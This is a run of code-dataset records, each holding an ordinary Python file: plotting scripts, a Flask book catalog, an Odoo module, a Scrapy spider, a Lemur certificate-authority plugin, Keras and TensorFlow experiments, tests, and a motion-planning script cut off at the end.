rate')\nplt.xlabel('Population')\nplt.legend(['random', 'self'], loc='lower right')\nplt.suptitle('Random vs. self')\nplt.xlim([0, 100])\n\n#plot_pop200(to_gen=plot_gen, file='pop200_', folder='pop_pool', title='Random ')\n\n#plot_pop200(to_gen=plot_gen, file='pop40_', folder='pop_pool_small', title='small')\n#plot_pop200(to_gen=plot_gen, file='pop40_all_', folder='pop_pool_small_all', title='small')\n\nplt.show()\n'''\nf = [[1, 2], [3, 4]]\nf = np.append(f, [5, 6])\n\nprint(f)\nprint(np.sum(np.split(f, 3), axis=1))\n'''\n","sub_path":"ludoAI/genetic/plot_g.py","file_name":"plot_g.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"77784795","text":"from database import db, marshmallow, database_init\n\n\n# Define the Book class that overrides SQLAlchemy's Model class\nclass Book(db.Model):\n # Define the Book fields which will be mapped to database columns\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False,)\n topic = db.Column(db.String(200), nullable=False,)\n quantity = db.Column(db.Integer, nullable=False, default=0,)\n price = db.Column(db.Float, nullable=False)\n\n # Constructor\n def __init__(self, title, topic, quantity, price):\n self.title = title\n self.quantity = quantity\n self.topic = topic\n self.price = price\n\n # Static method to search for books based on the topic\n @classmethod\n def search(cls, topic):\n # Returns books that contain the query string, ignoring case\n return Book.query.filter(Book.topic.ilike(f'%{topic}%'))\n\n # Static method to get a book using its ID\n @classmethod\n def get(cls, id):\n return Book.query.get(id)\n\n # Static method to update the fields of a book given its ID\n # If the field is not passed (or passed as None), it will not be affected\n @classmethod\n def update(cls, id, title=None, quantity=None, topic=None, price=None):\n book = Book.query.get(id)\n if book is None:\n return None\n book.title = title if title is not None else book.title\n book.quantity = quantity if quantity is not None and quantity >= 0 else book.quantity\n book.topic = topic if topic is not None else book.topic\n book.price = price if price is not None and price >= 0.0 else book.price\n\n db.session.commit()\n return book\n\n\n# Add the 4 books as an initial entry to the database\ndatabase_init += [\n Book('How to get a good grade in DOS in 20 minutes a day', 'Distributed Systems', 10, 25.00),\n Book('RPCs for Dummies', 'Distributed Systems', 5, 50.00),\n Book('Xen and the Art of Surviving Graduate School', 'Graduate School', 10, 15.00),\n Book('Cooking for the Impatient Graduate Student', 'Graduate School', 25, 10.00)\n]\n\n\n# Define Marshmallow Formatter Schema class for query-by-topic response fields\nclass TopicSchema(marshmallow.Schema):\n class Meta:\n fields = ('id', 'title', 'topic')\n\n\n# Define Marshmallow Formatter Schema class for query-by-item response fields\nclass ItemSchema(marshmallow.Schema):\n class Meta:\n fields = ('title', 'quantity', 'price')\n\n\n# Define Marshmallow Formatter Schema class for update response fields\nclass UpdateSchema(marshmallow.Schema):\n class Meta:\n fields = ('title', 'quantity', 'topic', 'price')\n\n\n# Instantiate an object from each schema class\nitem_schema = ItemSchema()\ntopic_schema = TopicSchema(many=True)\nupdate_schema = UpdateSchema()\n\n\n","sub_path":"bzr-catalog/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479968572","text":"# -*- coding: utf-8 -*-\n# © 2018 - ADAX Technology\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\n\nfrom odoo import models, fields, api, exceptions\n\n\nclass uppercase_product_template(models.Model):\n _inherit = 'product.template'\n\n @api.onchange('name')\n def name_uppercase_templete(self):\n self.name = self.name.upper() if self.name else False\n\nclass uppercase_product(models.Model):\n _inherit = 'product.product'\n\n @api.onchange('name')\n def name_uppercase_product(self):\n self.name = self.name.upper() if self.name else False","sub_path":"modulos/inventario/uppercase_product/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264589670","text":"from flask import Flask, request, jsonify, abort\nfrom pymongo import MongoClient\nfrom trlight import init_state, get_response, clear_sequences\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\ndef get_collection():\n return MongoClient(\"mongodb://db:27017\").trl.seq\n\n@app.route(\"/sequence/create\", methods=['POST'])\ndef create_sequence():\n response = {\"status\": \"ok\", \"response\": {\"sequence\": init_state(get_collection())}}\n return jsonify(**response)\n\n@app.route(\"/observation/add\", methods=['POST'])\ndef observation_add():\n json = request.get_json()\n if not json:\n return abort(400)\n response = get_response(json, get_collection())\n return jsonify(**response)\n\n@app.route(\"/clear\", methods=[\"POST\"])\ndef clear():\n clear_sequences(get_collection())\n response = {\"status\": \"ok\", \"response\": \"ok\"}\n return jsonify(**response)\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"606053937","text":"from functools import reduce\n\nfrom nodes import Bernoulli\nfrom gibbs import sample\n\nBurglary = Bernoulli(name='Burglary', ps=.001)\nEarthquake = Bernoulli(name='Earthquake', ps=.002)\nAlarm = Bernoulli(name='Alarm', ps=[ .001, .29, .94, .95 ])\nJohnCalls = Bernoulli(name='JohnCalls', ps=[ .05, .90 ], val=0, observed=True)\nMaryCalls = Bernoulli(name='MaryCalls', ps=[ .01, .70 ], val=0, observed=True)\n\nBurglary.add_child(Alarm)\nAlarm.add_parent(Burglary)\nEarthquake.add_child(Alarm)\nAlarm.add_parent(Earthquake)\n\nAlarm.add_child(JohnCalls)\nJohnCalls.add_parent(Alarm)\nAlarm.add_child(MaryCalls)\nMaryCalls.add_parent(Alarm)\n\nnodes = [ Burglary, Earthquake, Alarm, JohnCalls, MaryCalls ]\n\nsamples = sample(nodes)\n\n# Check the Burglary count\ncount = reduce(lambda count, s: count + s[0], samples, 0)\n\nprint(count)\n\n#P(Burglary=true) = 0.001\n#P(Eathquake=true) = 0.002\n#P(Alarm=true | Burglary=true, Earthquake=true) = 0.95\n#P(Alarm=true | Burglary=true, Earthquake=false) = 0.94\n#P(Alarm=true | Burglary=false, Earthquake=true) = 0.29\n#P(Alarm=true | Burglary=false, Earthquake=false) = 0.001\n#P(JohnCalls=true | Alarm=true) = 0.90\n#P(JohnCalls=true | Alarm=false) = 0.05\n#P(MaryCalls=true | Alarm=true) = 0.70\n#P(MaryCalls=true | Alarm=false) = 0.01\n\n","sub_path":"mcmc1-gibbs-sampling/experiments/p-burglary-given-john-does-not-call-and-mary-does-not-call.py","file_name":"p-burglary-given-john-does-not-call-and-mary-does-not-call.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"305177379","text":"# -*- coding: utf-8 -*-\nimport json\nimport re\n\nimport scrapy\n\nfrom locations.items import GeojsonPointItem\nfrom locations.hours import OpeningHours\n\n\nclass ErnstYoungSpider(scrapy.Spider):\n name = \"ernst_young\"\n item_attributes = { 'brand': \"Ernst & Young\" }\n allowed_domains = []\n start_urls = [\n 'https://www.ey.com/eydff/services/officeLocations.json',\n ]\n\n def parse_office(self, office):\n properties = {\n 'name': office[\"name\"],\n 'ref': office[\"href\"].replace('/locations/', ''),\n 'addr_full': office[\"officeAddress\"].strip().replace('\\r\\n', ' '),\n 'city': office[\"officeCity\"],\n 'postcode': office[\"officePostalCode\"],\n 'country': office[\"officeCountry\"],\n 'phone': office[\"officePhoneNumber\"],\n 'lat': float(office[\"officeLatitude\"]),\n 'lon': float(office[\"officeLongitude\"]),\n }\n return properties\n\n def parse(self, response):\n data = json.loads(response.body_as_unicode())\n\n for country in data[\"countries\"]:\n\n for state in country[\"states\"]:\n state_abbr = state[\"stateAbbreviation\"]\n for city in state[\"cities\"]:\n for office in city[\"offices\"]:\n properties = self.parse_office(office)\n properties[\"state\"] = state_abbr\n properties[\"website\"] = response.urljoin(office[\"href\"])\n yield GeojsonPointItem(**properties)\n\n for city in country[\"cities\"]:\n\n for office in city[\"offices\"]:\n properties = self.parse_office(office)\n properties[\"website\"] = response.urljoin(office[\"href\"])\n yield GeojsonPointItem(**properties)\n","sub_path":"locations/spiders/ernst_young.py","file_name":"ernst_young.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"128575865","text":"\"\"\"\n.. module: lemur.plugins.lemur_mscertsrv.plugin\n :platform: Unix\n :synopsis: This module is responsible for communicating with the Microsoft Certificate Services CA.\n :copyright: (c) 2016 by Thomson Reuters\n :license: Apache, see LICENSE for more details.\n\n.. moduleauthor:: Bugga Luggs \n\"\"\"\n\nimport json\nimport requests\nimport re\nimport io\nimport pem\nfrom bs4 import BeautifulSoup\nfrom requests_ntlm import HttpNtlmAuth\nfrom cryptography import x509\n\nfrom flask import current_app\n\nfrom lemur.common.utils import validate_conf\nfrom lemur.plugins.bases import IssuerPlugin\nfrom lemur.plugins import lemur_mscertsrv as mscertsrv\n\n\n\nclass MSCertSrvIssuerPlugin(IssuerPlugin):\n title = 'MSCERTSRV'\n slug = 'mscertsrv-issuer'\n description = 'Enables the creation of certificates by Microsoft Certificate Services CA'\n version = mscertsrv.VERSION\n\n author = 'Bugga Luggs'\n author_url = 'https://github.com/pr8kerl/lemur-mscertsrv.git'\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the issuer with the appropriate details.\"\"\"\n\n required_vars = [\n 'MSCERTSRV_URL',\n 'MSCERTSRV_DOMAIN',\n 'MSCERTSRV_USERNAME',\n 'MSCERTSRV_PSW',\n 'MSCERTSRV_INTERMEDIATE',\n 'MSCERTSRV_ROOT',\n 'MSCERTSRV_CERTIFICATE_TEMPLATE',\n ]\n validate_conf(current_app, required_vars)\n\n self.session = requests.Session()\n current_app.logger.info(\"MSCERTSRV: init\")\n super(MSCertSrvIssuerPlugin, self).__init__(*args, **kwargs)\n\n def create_certificate(self, csr, issuer_options):\n \"\"\"\n Creates a MSCERTSRV certificate.\n\n :param csr:\n :param issuer_options:\n :return:\n \"\"\"\n # ping the server to setup the auth and ensure we are valid\n auth_response = self.ntlm_authenticate()\n current_app.logger.info(auth_response)\n current_app.logger.info(auth_response.headers)\n\n url = \"{0}{1}\".format(current_app.config.get('MSCERTSRV_URL'), '/certsrv/certfnsh.asp')\n\n data = self.get_post_data(csr, issuer_options)\n current_app.logger.info(data)\n\n # request certificate from MS CA\n response = self.session.post(url, data=data)\n current_app.logger.info(response)\n current_app.logger.info(response.request.headers)\n response.raise_for_status()\n\n durl = self.parse_download_url(response.content)\n if not durl:\n raise ValueError('no download url returned - pls investigate logs')\n\n # download cert in pem format\n response = self.session.get(durl)\n response.raise_for_status()\n current_app.logger.info(response.headers)\n certs = pem.parse(response.content)\n cert = \"\\n\".join(str(certs[0]).splitlines())\n current_app.logger.info(\"MSCERTSRV: cert: {0}\".format(cert))\n\n return cert, current_app.config.get('MSCERTSRV_INTERMEDIATE')\n\n def parse_download_url(self, body):\n \"\"\"pull out the relative url to download the single certificate in PEM format.\"\"\"\n soup = BeautifulSoup(body, 'html.parser')\n\n download_url = None\n # certnew.cer?ReqID=127&Enc=b64\n for elem in soup.find_all('a', href=re.compile('certnew\\.cer\\?ReqID=\\d+&Enc=b64')):\n href = elem['href']\n current_app.logger.info(\"MSCERTSRV: matched href: {0}\".format(href))\n relative_download_url = '/certsrv/' + href\n download_url = \"{0}{1}\".format(current_app.config.get('MSCERTSRV_URL'), relative_download_url)\n current_app.logger.info(\"MSCERTSRV: download url: {0}\".format(download_url))\n\n if not download_url:\n current_app.logger.info(\"MSCERTSRV: download url not found: {0}\".format(soup))\n\n return download_url\n\n\n def get_post_data(self, csr, issuer_options):\n current_app.logger.info(\"MSCERTSRV: requesting a new mscertsrv certificate with csr: {0}\".format(csr))\n current_app.logger.info(\"MSCERTSRV: issuer options: {0}\".format(issuer_options))\n template = 'CertificateTemplate:' + current_app.config.get('MSCERTSRV_CERTIFICATE_TEMPLATE')\n data = {\n 'Mode': 'newreq',\n 'CertRequest': csr,\n 'CertAttrib': template,\n 'UserAgent': 'Lemur MSCERTSRV Plugin',\n 'SaveCert': 'yes',\n 'TargetStoreFlags': 0,\n 'ThumbPrint': '',\n 'FriendlyType': 'Saved-Request Certificate (2017-5-11 22:32:31)'\n }\n return data\n\n def ntlm_authenticate(self):\n \"\"\"\n Accesses the MSCCERTSRV csr request page to setup the NTLM session.\n\n :return:\n \"\"\"\n session_username = current_app.config.get('MSCERTSRV_DOMAIN') + '\\\\' + current_app.config.get('MSCERTSRV_USERNAME')\n # session_username = current_app.config.get('MSCERTSRV_USERNAME')\n session_pwd = current_app.config.get('MSCERTSRV_PSW')\n url = \"{0}{1}\".format(current_app.config.get('MSCERTSRV_URL'), '/certsrv/certrqxt.asp')\n\n self.session.auth = HttpNtlmAuth(session_username, session_pwd, self.session)\n auth_response = self.session.get(url, verify=False)\n auth_response.raise_for_status()\n return auth_response\n\n @staticmethod\n def create_authority(options):\n \"\"\"\n Creates an authority, this authority is then used by Lemur to allow a user\n to specify which Certificate Authority they want to sign their certificate.\n\n :param options:\n :return:\n \"\"\"\n role = {'username': '', 'password': '', 'name': 'mscertsrv'}\n current_app.logger.info(\"MSCERTSRV: creating a new authority\")\n return current_app.config.get('MSCERTSRV_ROOT'), \"\", [role]\n","sub_path":"lemur_mscertsrv/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"428939795","text":"import keras\nfrom keras import models, Model\nfrom matplotlib import pyplot\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import Model\nfrom matplotlib import pyplot as plt\nfrom numpy import expand_dims\nimport sys\n\n\n\n\nmodel = keras.models.load_model('aid/final_model_2.h5')\nmodel.summary()\n\nfor layer in model.layers:\n\t# check for convolutional layer\n\tif 'conv' not in layer.name:\n\t\tcontinue\n\t# get filter weights\n\tfilters, biases = layer.get_weights()\n\tprint(layer.name, filters.shape)\n\n\nfilters, biases = model.layers[0].get_weights()\n# normalize filter values to 0-1 so we can visualize them\nf_min, f_max = filters.min(), filters.max()\nfilters = (filters - f_min) / (f_max - f_min)\n# plot first few filters\nn_filters, ix = 6, 1\nfor i in range(n_filters):\n # get the filter\n f = filters[:, :, :, i]\n # plot each channel separately\n for j in range(3):\n # specify subplot and turn of axis\n ax = pyplot.subplot(n_filters, 3, ix)\n ax.set_xticks([])\n ax.set_yticks([])\n # plot filter channel in grayscale\n pyplot.imshow(f[:, :, j], cmap='brg')\n ix += 1\n\t# show the figure\nfilename = sys.argv[0].split('/')[-1]\nplt.savefig(filename + 'filter_plt_brg.png')\nplt.close()\npyplot.show()\n\nfor i in range(len(model.layers)):\n\tlayer = model.layers[i]\n\t# check for convolutional layer\n\tif 'conv' not in layer.name:\n\t\tcontinue\n\t# summarize output shape\n\tprint(i, layer.name, layer.output.shape)\n\n\nmodel.summary()\nmodel = Model(inputs=model.inputs, outputs=model.layers[0].output)\n\nimg = load_img('train/dog/dog.1.jpg', target_size=(200, 200))\n# convert the image to an array\nimg = img_to_array(img)\n# expand dimensions so that it represents a single 'sample'\nimg = expand_dims(img, axis=0)\n# prepare the image (e.g. scale pixel values for the vgg)\n# get feature map for first hidden layer\nfeaturemaps = model.predict(img)\n# plot all 64 maps in an 8x8 squares\n\nsquare = 4\nix = 1\n\nfor _ in range(square):\n for _ in range(square):\n # specify subplot and turn of axis\n ax = plt.subplot(square, square, ix)\n ax.set_xticks([])\n ax.set_yticks([])\n # plot filter channel in grayscale\n plt.imshow(featuremaps[0, :, :, ix-1], cmap='brg')\n ix += 1\n\t# show the figure\nfilename = sys.argv[0].split('/')[-1]\nplt.savefig(filename + 'map_plt_brg.png')\nplt.close()\nplt.show()\n\n\n\n","sub_path":"filtersvis.py","file_name":"filtersvis.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465222437","text":"import tensorflow as tf\nfrom flows import NormalRW, DFlow, NVPFlow, LogNormal, GVAR, phase,Normal, floatX, MVNormal, MVNormalRW, Linear, LinearChol\nfrom flows.models import VARmodel\nimport flows\n\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.contrib.distributions import WishartCholesky\nimport math\nfrom tqdm import tqdm\nimport pickle as pkl\n\nnp.random.seed(1234)\ntf.set_random_seed(1234)\n\nccodes = ['AUS', 'FRA', 'GBR']\ndatas = ['../../CDATA/{}.csv'.format(x) for x in ccodes]\n\ndatas = [pd.read_csv(x, index_col='VARIABLE').iloc[:,:-1] for x in datas]\n\nmean_std = 0.\nfor data in datas:\n std = np.std(data.values[:,1:] - data.values[:,:-1], axis=1)\n mean_std = std + mean_std\nmean_std /= len(datas)\nmean_std = np.concatenate([mean_std]*2, axis=0)\nprint('Mean std: {}'.format(mean_std))\n\nmax_year = 0\nfor i, data in enumerate(datas):\n data = data.astype(floatX)\n data.columns = data.columns.astype('float32')\n \n new_data = np.concatenate([data.values.T[1:], data.values.T[:-1]], axis=1)\n new_data_columns = data.columns[1:]\n new_data = pd.DataFrame(new_data.T/mean_std[:,np.newaxis], columns=new_data_columns)\n data = new_data\n datas[i] = data\n max_year = max(max(data.columns), max_year)\n\nVAR_DIM = 4\n\nYEARS = [x for x in data.columns if x > 2000]\n\ncountry_data = {c:d for c,d in zip(ccodes, datas)}\n\n\n#BUILDING the model\n\ncurrent_year = tf.placeholder(tf.float32, shape=(), name='current_year')\ntf.summary.scalar('current_year', current_year)\n\ndef create_variation():\n with tf.variable_scope('variation_rate', dtype=floatX):\n variation_prior = tf.distributions.Exponential(rate=4.5)\n dim_ = (VAR_DIM*2+1)*VAR_DIM\n variation_mu = tf.get_variable('mu', shape=[dim_], initializer=tf.constant_initializer(math.log(0.3)))\n variation_presigma = tf.get_variable('presigma', shape=[dim_], initializer=tf.constant_initializer(-3.))\n variation_d = LogNormal(dim=dim_, mu=variation_mu, sigma=tf.exp(variation_presigma))\n \n variation = variation_d.sample()\n\n pp = tf.cast(tf.reduce_sum(variation_prior.log_prob(tf.cast(variation, tf.float32))), floatX)\n ld = variation_d.logdens(variation)\n tf.add_to_collection('logdensities', ld)\n tf.add_to_collection('priors', pp)\n\n tf.summary.histogram('variation', variation)\n tf.summary.scalar('mean_variation', tf.reduce_mean(variation))\n return variation\n\nglobal_inf = DFlow([NVPFlow(dim=(VAR_DIM*2+1)*VAR_DIM, name='flow_{}'.format(i)) for i in range(6)], init_sigma=0.01)\nglobal_prior = Normal(None, sigma=5.).logdens(global_inf.output)\ntf.add_to_collection('priors', global_prior)\ntf.add_to_collection('logdensities', global_inf.logdens[0])\n\n\nmodels = []\nindiv_logdens = []\nindiv_priors = []\nindivs = {}\n\nwith tf.variable_scope(tf.get_variable_scope(), dtype=floatX, reuse=tf.AUTO_REUSE):\n for country, data in country_data.items():\n with tf.variable_scope(country):\n variation = create_variation()\n individ_variation_prior = Normal((VAR_DIM*2+1)*VAR_DIM, sigma=variation, mu=global_inf.output[0])\n\n aux = tf.concat([global_inf.output, variation[tf.newaxis]], axis=-1)\n individ_variation = DFlow([NVPFlow((VAR_DIM*2+1)*VAR_DIM, \n name='nvp_{}'.format(i), \n aux_vars=aux) for i in range(6)], init_sigma=0.01)\n\n ind = individ_variation.output[0] + global_inf.output[0]\n indivs[country] = ind\n\n indiv_logdens.append(individ_variation.logdens)\n indiv_priors.append(individ_variation_prior.logdens(ind))\n\n model = VARmodel(data, name='{}_model'.format(country), var_dim=VAR_DIM, mu=ind[tf.newaxis], current_year=current_year)\n models.append(model)\n\ngraph = tf.get_default_graph()\n\nprior = tf.reduce_sum([model.priors for model in models])+ tf.reduce_sum(indiv_priors) + tf.reduce_sum(graph.get_collection('priors'))\n\nlogdensity = tf.reduce_sum([model.logdensities for model in models])+ tf.reduce_sum(indiv_logdens) + tf.reduce_sum(graph.get_collection('logdensities'))\n\nkl = logdensity - prior\nkl /= 36*200*4\n\n\nkls = tf.summary.scalar('KLd', kl)\nsummary = tf.summary.merge_all()\n\n\nmain_op = tf.train.AdamOptimizer(0.0001).minimize(kl)\n\nsess = tf.InteractiveSession()\ninit = tf.global_variables_initializer()\n\ninit.run()\n\nwriter = tf.summary.FileWriter('/tmp/tfdbg/gpu0')\n\ndef validate_year(year):\n cdic = {model.name:model for model in models}\n preds = {model.name:[] for model in models}\n preds_t = {model.name: model.preds for model in models}\n\n for step in range(1500):\n preds_i = sess.run(preds_t, {current_year:year})\n for k in preds.keys():\n preds[k].append(preds_i[k][cdic[k].years > year])\n \n mean_pred = {k:np.mean(v, axis=0) for k,v in preds.items()}\n for c, pred in mean_pred.items():\n pred_years = [x for x in YEARS if x > year]\n pred = pd.DataFrame(pred.T, columns=pred_years)\n mean_pred[c] = pred\n\n for model in models:\n try:\n a = model.data_raw.loc[:,year].values[:VAR_DIM]\n except KeyError:\n a = np.zeros(VAR_DIM, dtype=floatX)*np.nan\n mean_pred[model.name]['CYEAR={}'.format(year)] = a\n return mean_pred\n\nsaver = tf.train.Saver()\n\noptions = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\nrun_metadata = tf.RunMetadata()\n\nfd = {current_year:YEARS[0]}\nsess.run(main_op, fd, options=options, run_metadata=run_metadata)\n\nfrom tensorflow.python.client import timeline\n# Create the Timeline object, and write it to a json file\nfetched_timeline = timeline.Timeline(run_metadata.step_stats)\nchrome_trace = fetched_timeline.generate_chrome_trace_format()\nwith open('timeline_01.json', 'w') as f:\n f.write(chrome_trace)\n","sub_path":"experiments/gpu_test/VAR-hierarchical_shrinkage.py","file_name":"VAR-hierarchical_shrinkage.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"286279688","text":"\"\"\"Tournament play experiment.\"\"\"\nfrom __future__ import absolute_import\nimport netbuilder\nimport gp\nimport pickle\n# Use cuda\nCUDA = True\n\nif __name__=='__main__':\n # setup a tournament!\n nb_evolution_steps = 20\n tournament = \\\n gp.TournamentOptimizer(\n population_sz=50,\n init_fn=netbuilder.randomize_network,\n mutate_fn=netbuilder.mutate_net,\n nb_workers=5,\n use_cuda=True)\n\n for i in range(nb_evolution_steps):\n print('\\nEvolution step:{}'.format(i))\n print('================')\n tournament.step()\n # keep track of the experiment results & corresponding architectures\n name = \"tourney_{}\".format(i)\n pickle.dump(tournament.stats, open(name + '.stats','wb'))\n pickle.dump(tournament.history, open(name +'.pop','wb'))\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348963732","text":"def f_cpn(k):\r\n\treturn lambda n: (k*n*(n-1))/2 + 1\r\n\r\ns_cpn = lambda i: \"cpn(\"+str(i)+\")\"\r\n\r\ndef cpn_freqs(gons,bound):\r\n\tfreq = {}\r\n\tfor i in range(3,gons+1):\r\n\t\tp = p_frequency(f_cpn(i),bound)\r\n\t\tprint(\"============\")\r\n\t\tprint(\"cpn(\"+str(i)+\"): \"+str(p))\r\n\t\tprint(\"============\")\r\n\t\tfreq[\"cpn(\"+str(i)+\")\"] = p\r\n\treturn freq\r\n\r\ndef resolve_cpn(freqs):\r\n\tfor i in range(3,len(freqs)+3):\r\n\t\tprint(i,\":\",freqs[s_cpn(i)])\r\n","sub_path":"prime-patterns/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"260848291","text":"#!/usr/bin/env python3\n\nimport sys, os\nimport _pickle as cPickle\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom get_data import get_data\nfrom get_model import get_model\n\ndef main():\n if len(sys.argv) < 3:\n raise Exception('missing training data or model name')\n\n events_json_path = sys.argv[1]\n model_name = sys.argv[2]\n\n data = get_data(events_json_path)\n\n train_documents = data['train']['documents']\n train_labels = data['train']['labels']\n\n test_documents = data['test']['documents']\n test_labels = data['test']['labels']\n\n vectorizer = CountVectorizer(\n analyzer = 'word',\n tokenizer = None,\n preprocessor = None,\n stop_words = None,\n max_features = 5000\n )\n\n\n train_data_features = (\n vectorizer.fit_transform(train_documents).toarray()\n )\n\n model = get_model(train_data_features, train_labels, model_name)\n\n test_data_features = vectorizer.transform(test_documents).toarray()\n print(\"Score: \", model.score(test_data_features, test_labels))\n save_model(model, model_name, vectorizer)\n\ndef save_model(model, model_name, vectorizer):\n pathname = os.path.dirname(sys.argv[0])\n fullpath = os.path.abspath(pathname)\n with open(fullpath + '/models/' + model_name + '.pkl', 'wb') as fid:\n cPickle.dump(model, fid)\n with open(\n fullpath + '/models/' + model_name + '_vectorizer.pkl', 'wb'\n ) as fid:\n cPickle.dump(vectorizer, fid)\n\nif __name__ == '__main__':\n main()\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335613262","text":"# This code takes the square root of the number inputed\n\n# imports module\nfrom sys import argv\n# says that argv should expect the run of the program and a user input in the terminal\nscript, arg = argv\n\n# makes variable \"n\" to the user input\nn = int(arg)\n\nfor i in range( 1, n ):\n \n # if the floor of the user input divided by \"i\" is the same as the user input AND if the mod of the user input is 0, print the floor of the user input divided by the \"i\"\n if n//i == i and n%i == 0:\n print(n//i)\n \n # exit(0) will be a good exit\n exit(0)\n \nprint(False)","sub_path":"webDev/ex37.py","file_name":"ex37.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"438052359","text":"# -*- coding:utf-8 -*-\nimport requests\nimport json\nclass RunMain(): # 封装 get/post 方法\n def send_post(self,url,data,headers):\n result = requests.post(url = url,data = data,headers= headers).json()\n res = json.dumps(result, ensure_ascii=False, sort_keys=True, indent=2)\n return res\n def send_get(self,url,data,headers):\n result = requests.get(url = url,data = data,headers = headers).json()\n res = json.dumps(result,ensure_ascii=False,sort_keys=True,indent=2)\n return res\n def run_main(self,method,url=None,data=None,headers = None):\n result = None\n if method == 'get':\n result = self.send_get(url,data,headers)\n elif method == 'post':\n result = self.send_post(url,data,headers)\n return result\nif __name__ == '__main__':\n url = 'http://127.0.0.1:8888/login'\n data1 = {'name':'xiaoming','pwd':'111'}\n data2 = 'name=xiaoming&pwd=11'\n result1 = RunMain().run_main('post',url,data1)\n result2 = RunMain().run_main('get',url,data2)\n print(result1)\n print(result2)","sub_path":"common/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"52005703","text":"r\"\"\"\nTests for the :mod:`scglue.metrics` module\n\"\"\"\n\n# pylint: disable=redefined-outer-name, wildcard-import, unused-wildcard-import\n\n\nimport numpy as np\nimport pytest\n\nimport scglue.metrics\n\nfrom .fixtures import *\n\n\ndef test_mean_average_precision(rna_pp):\n mean_average_precision = scglue.metrics.mean_average_precision(\n rna_pp.obsm[\"X_pca\"],\n rna_pp.obs[\"ct\"].to_numpy().ravel()\n )\n assert 0 <= mean_average_precision <= 1\n\n\ndef test_seurat_alignment_score(atac_pp):\n seurat_alignment_score = scglue.metrics.seurat_alignment_score(\n atac_pp.obsm[\"X_lsi\"],\n atac_pp.obs[\"ct\"].to_numpy().ravel()\n )\n assert 0 <= seurat_alignment_score <= 1\n\n\ndef test_foscttm(rna_pp, atac_pp):\n foscttm_x, foscttm_y = scglue.metrics.foscttm(\n rna_pp.obsm[\"X_pca\"], rna_pp.obsm[\"X_pca\"]\n )\n assert np.all(foscttm_x == 0)\n assert np.all(foscttm_y == 0)\n foscttm_x, foscttm_y = scglue.metrics.foscttm(\n rna_pp.obsm[\"X_pca\"][:20], atac_pp.obsm[\"X_lsi\"][:20]\n )\n assert 0 < foscttm_x.mean() <= 1\n assert 0 < foscttm_y.mean() <= 1\n\n with pytest.raises(ValueError):\n foscttm_x, foscttm_y = scglue.metrics.foscttm(\n rna_pp.obsm[\"X_pca\"], atac_pp.obsm[\"X_lsi\"]\n )\n","sub_path":"tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460769582","text":"import numpy as np\nfrom scipy import spatial\nimport matplotlib.pyplot as plt\nimport math \nfrom numpy import cos, sin, pi\nimport numpy as np\nfrom numpy import pi, cos, sin\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nfrom pylab import *\nfrom casadi import Function, linspace, vertcat, horzcat, DM, interpolant, sum1, MX, hcat, sumsqr\nfrom rockit import *\nfrom rockit import Ocp , FreeTime, MultipleShooting\nfrom MPC_Bubble_tunnel_generation_v2 import generate_bubbles_mpc_v2, plotting, get_bubbles_mpc_loop, generate_bubbles_mpc_v3\nfrom MPC_Grid_generation import create_obstacles_mpc, create_global_path_mpc\nfrom Bubble_tunnel_generation_v2 import create_tunnel, plotting_v2\n\n\ndef is_inside_ellipse( x, y, xp, yp, a, b): \n \n is_inside = 0\n\n ellipse = (x-xp)**2/a**2 + (y-yp)**2/b**2\n \n if (ellipse < 1): \n is_inside = 1\n \n return is_inside\n \ndef find_path(global_path_x, global_path_y, xp , yp , radiusx ,radiusy, N):\n \n index = 0\n for i in range(0, len(global_path_x)):\n e = (global_path_x[i]-xp)**2/radiusx**2 + 